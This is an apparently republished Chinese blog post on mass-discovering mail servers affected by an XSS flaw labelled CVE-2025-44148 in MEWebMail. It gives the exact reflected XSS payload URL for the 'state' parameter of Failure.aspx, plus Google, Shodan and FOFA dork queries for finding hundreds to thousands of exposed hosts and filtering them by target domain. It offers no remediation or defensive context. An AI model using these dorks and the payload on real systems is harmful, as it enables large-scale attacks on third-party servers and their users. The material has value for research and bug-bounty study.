XSS大规模挖掘实战：利用谷歌、Shodan等平台发现CVE-2025-44148漏洞

原创

qife122

发布于 2026-01-03 14:29:40

1330

文章被收录于专栏：网络安全技术点滴分享网络安全技术点滴分享

XSS大规模挖掘：CVE-2025-44148

Google + Shodan + FOFA + ZoomEye Dorking

作者：Abhirup Konwar

2025年8月24日

1️⃣ Google Dorking

inurl:/Mondo/lang/sys

然后，只需在下方端点后追加XSS载荷，将其设置为参数“state”的值。首先将“Login.aspx”替换为“Failure.aspx”。

/Mondo/lang/sys/Failure.aspx?state=%22;}alert(1);function%20test(){%22

（按回车或点击查看完整尺寸图片）

2️⃣ Shodan Dorking

(200+ 条结果)

http.html:"/MEWebMail/Mondo"

目标过滤

http.html:"/MEWebMail/Mondo" hostname:target.com

http.html:"/MEWebMail/Mondo" ssl.cert.subject.cn:target.com

2个重要的切面分析：

Domain
ssl.cert.subject.cn

（按回车或点击查看完整尺寸图片）

3️⃣ FOFA Dorking

(2000+ 条结果)

body="/MEWebMail/Mondo"

（按回车或点击查看完整尺寸图片）

CSD0tFqvECLokhw9aBeRqqjH1LDrKjpa6GLzq6aSalFOjy8LSkMQVhDym9Ro/PPKMi9i/0fzjc/f5q2BMEcWEfNONvpLsiL2V46Jeoq6iJI=

原创声明：本文系作者授权腾讯云开发者社区发表，未经许可，不得转载。

如有侵权，请联系 cloudcommunity@tencent.com 删除。

网络安全

xss

计算机

原创声明：本文系作者授权腾讯云开发者社区发表，未经许可，不得转载。

如有侵权，请联系 cloudcommunity@tencent.com 删除。

登录后参与评论

0 条评论

热度